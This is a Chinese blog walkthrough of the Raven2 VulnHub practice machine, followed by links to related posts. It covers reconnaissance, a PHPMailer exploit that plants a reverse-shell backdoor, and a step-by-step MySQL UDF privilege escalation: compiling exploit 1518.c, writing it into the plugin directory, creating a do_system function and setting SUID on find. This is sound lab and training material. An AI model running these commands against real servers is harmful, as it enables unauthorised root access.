Raven2--靶机渗透--MysqlUDF提权--linux提权

最新推荐文章于 2024-07-03 12:10:57 发布
最新推荐文章于 2024-07-03 12:10:57 发布
阅读量3.1k 收藏 1
点赞数
分类专栏: 权限提升 靶机 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/z2560088/article/details/122977571
版权

信息搜集

nmap扫描端口和ip

发现80端口,用dirsearch扫描目录

扫描到了vendor和wordpress目录以及contact.php页面

随便看看,找到一个flag,并发现搭建了PHPMail

 之前爆出过phpmail的漏洞,我们用kali的searchexploit搜索一下

 再根据vender/version文件得知版本号为

 

 开头添加这个 防止乱码

#!/usr/bin/python
# -*- coding: utf-8 -*-

 修改exp

python3执行 

 访问http://192.168.160.150/contact.php 会生成一个能够反弹shell的后门,访问该后门php,kali开启监听,即可反弹shell

 

python -c 'import pty;pty.spawn("/bin/bash")'  得到一个交互式shell

find / -name "flag*"    发现

 

使用LinEnum.sh信息搜集

mysql是用root登录的,查看WordPress配置文件得到root密码

 UDF提权

searchexploit mysql udf
searchexploit 1518.c -m
gcc -g -c 1518.c  //编译出1518.o
gcc -g -shared -o zwt.so 1518.o -lc //创建一个动态链接库,输入文件是1518.o

 传输到shell上

 

use mysql; 
#进入数据库
create table zwt(line blob); 
#创建数据表zwt
insert into zwt values(load_file('/tmp/zwt.so')); 
#插入数据
select * from zwt into dumpfile '/usr/lib/mysql/plugin/zwt1.so'; 
#( Foo表成功插入二进制数据,
然后利用dumpfile函数把文件导出
outfile 多行导出,dumpfile一行导出
outfile会有特殊的转换,而dumpfile是原数据导出
新建存储函数)
create function do_system returns integer soname 'zwt.so'; 
#(创建自定义函数do_system 类型是integer,别名
soname文件名字然后查询函数是否创建成功)
select * from mysql.func;
select do_system('chmod u+s /usr/bin/find'); 
#(调用do_system函数来给find命令所有者的suid权限,使其可以执行
 root命令)
quit

 

 

 

Zhao蔫儿
关注
专栏目录
VulnHub-Raven:2靶机渗透
ce666666的博客
02-04 3881
前言 通过VulnHub-Raven:2靶机渗透学习 攻击机:kali 靶机Raven 网段:192.168.123.0/24 知识点: PHPMailer 小于5.2.18 (CVE-2016-10033) UDF提权 工具: LinEnum——Linux枚举漏洞工具 dirsearch——目录扫描工具 CVE-2016-10033 原理:PHPMailer mail()函数功能,远程攻击者利用默认开启的PHPMailer可以运行构造的恶意代码,无需登录触发该漏洞,从而导致获取系统权限。
vulnhub-raven_2-linux-udf提权
MIs_Jiangyaomin的博客
05-31 239
端口扫描:nmap -sS -sV -A -p 1-62235 192.168.136.144目录扫描:phpmailer版本。
Raven 2 靶机渗透
banacyo14206的博客
08-24 894
0X00 前言 Raven 2中一共有四个flag,Raven 2是一个中级boot2root VM。有四个标志要捕获。在多次破坏之后,Raven Security采取了额外措施来强化他们的网络服务器,以防止黑客进入。 靶机下载地址:https://download.vulnhub.com/raven/Raven2.ova 提权辅助工具LinEnum下载:https://do...
Searchsploit漏洞利用搜索工具的介绍及使用
最新发布
Reset
07-03 973
kali自带的,Searchsploit会通过本地的Exploit-db查找软件漏洞信息。Exploit Database存储了大量的漏洞利用程序,是Offensive Security赞助的项目,目前是世界上公开收集漏洞最全的数据库,这个仓库每天都会更新。Exploit-DB是一个漏洞库,kali中保存了一个这个漏洞库的拷贝。
raven2靶机-udf提权
CTF小杂鱼的专栏
08-18 1295
较早的一台靶机,练习udf提权挺不错的。 考点:CVE 2016-10033、Mysql-udf提权 1、靶机导入虚拟机并开机,确定网络是nat模式,所在网络C段为192.168.43.1/24 2、C段探测寻找靶机入口点: nmap -T4 -n -v 192.168.43.1/24 -sn 得到靶机IP:192.168.43.146 3、探测靶机开放服务 nmap -T4 -n -v 192.168.43.146 4、打开http://192.168.43.1...
mysql靶机_[Vulnhub]靶机渗透-Raven:2
weixin_42493325的博客
02-19 260
0x01 Scan Host更加详细地扫描:0x02 Web Service还是有个wp,老规矩用wpscan看一下,同时扫描目录。flag1dirb扫描出错,所以这里用gobuster:挨个看了下发现了flag1:刚好wpscan的结果也出来了,wordpress的版本是4.8.7,主题twentyseven 2.2,大概看了没有什么可利用的洞。再仔细看一下当时扫出的目录,发现有PHPMaile...
VulnHub-Raven-靶机渗透学习
嗯嗯呐的博客
11-11 874
靶机地址:https://www.vulnhub.com/entry/raven-2,269/ 靶机描述:Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in
raven-for-redux:用于Redux的Raven中间件
02-05
。 不推荐使用 Sentry现在建议使用其新的SDK @sentry/browser而不是Raven。 请查看 ,以获取支持新SDK...npm install --save raven-for-redux 用法 浏览器 // store.js import Raven from "raven-js" ; // Or, you mig
Raven2-MySql udf提权
Demonering的博客
02-23 3918
0x01 信息收集 nmap扫描 nmap -A -T4 -p- 192.168.159.0/24 正在上传…重新上传取消 发现192.168.159.132开启了22、80、111、59992端口。 操作系统是linux、中间件是apache。 访问192.168.159.132的80端口 正在上传…重新上传取消 试下功能点,发现blog是用word press搭建的,但是页面显示不全,点击黑体大字Raven Security,发现了域名 raven.local 正在上传…重新上传取消
raven-ridge-nursery-web:乌鸦岭托儿所温度计界面
05-01
总的来说,"raven-ridge-nursery-web"项目是一个结合了硬件、云服务和Web开发的综合实例,展示了如何使用Raspberry Pi和AWS IoT Core来实现远程环境监控。这种解决方案对于农业、温室管理或其他需要实时环境数据的...
raven-python:Raven是Sentry(getsentry.com)的旧版Python客户端-已由sentry-python取代
02-04
2. **上下文信息**:Raven-Python允许开发者传递有关错误发生时的上下文信息,如用户ID、请求URL、环境变量等,帮助定位问题。 3. **自定义事件**:除了异常,开发者还可以记录其他类型的事件,如日志信息,以便更...
mysql提权工具
04-24
mysql自动提权工具,。。。。。。。。。。。。。。。。。。。。。。。
CTF工具 searchexploit - exp数据库.mht
12-13
CTF工具 searchexploit - exp数据库.mht
mysql提权方式linux_Linux提权的几种常用方式
weixin_32124135的博客
02-28 466
本文转载自微信公众号「Bypass」,作者Bypass 。转载本文请联系Bypass公众号。在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点,来达到提升权限的目的。1、内核漏洞提权提起内核漏洞提权就不得不提到脏牛漏洞(Dirty Cow),是存在时间最长且影响范围最广的漏洞之一。低权限用户可以利用该漏洞实现本地提权,...
以escalate靶机为例学习linux提权方式-linux提权学习笔记(1)
zr1213159840的博客
06-25 3001
linux11种提权方式总结
mysql提权_黑客渗透网站实战mysql提权操作,你明白吗???
weixin_39856630的博客
11-29 409
1、Mysql提权简介我们都知道网站所用脚本之间的不同权限也就大概的可以看出来,jsp 的默认权限一般都是 system 权限,而 aspx 的一般来说都高于 user 权限,一般来说。asp 和 PHP 的权限差不多,Pl ,cgi ,py 的权限一般和 Aspx 的差不多,MySQL 数据库提权之前,也就是最重要的一点,我们要知道 root 账号和密码,这个也就是最重要的,因为他有写入权限啊!...
raven靶机实战(linux-udf提权)-vuluhub系列(四)
PANDA墨森的博客
06-28 1012
这是vulnhub靶机系列文章的第四篇,本次的靶机感觉还是挺有趣的,学到的重要知识点为linux下-mysqludf提权以及某cms的漏洞getshell,开始吧... 靶机下载链接:https://download.vulnhub.com/raven/Raven2.ova 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13189038.html #001 环境搭建(nat) 攻击机kali:192.168.136.129 靶机Raven2:192.168.
mysql 提权_MYSQL提权总结
weixin_42515024的博客
01-18 523
经擦遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。一、利用mof提权前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL WindowsRemote System Level Exploit (Stuxnet...
靶机渗透】Escalate_Linux靶机渗透练习+12种提权方式
serendipity1130的博客
08-31 4390
注:这个靶机主要用来练习Linux提权,有超过12种的提权方法 1.主机发现:arp-scan -l,发现靶机ip为192.168.225.149,并进行访问 2.扫描端口,开启了80,22端口 nmap -n -p- -A 192.168.225.149 -o escalate.nmap 3.发现是默认的apache页面,那么爆破php后缀的路径,发现shell.php的页面,进行访问: dirb http://192.168.225.149 -X .php 4.提示:
linux安装debug-shell
04-29
Debug-shell 是一个用于在 Linux 内核中进行调试的工具集,可以帮助用户在内核中执行一些命令和查看一些信息。 下面是安装 debug-shell 的步骤: 1. 首先,你需要下载 debug-shell 的源代码。可以从以下网址下载:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值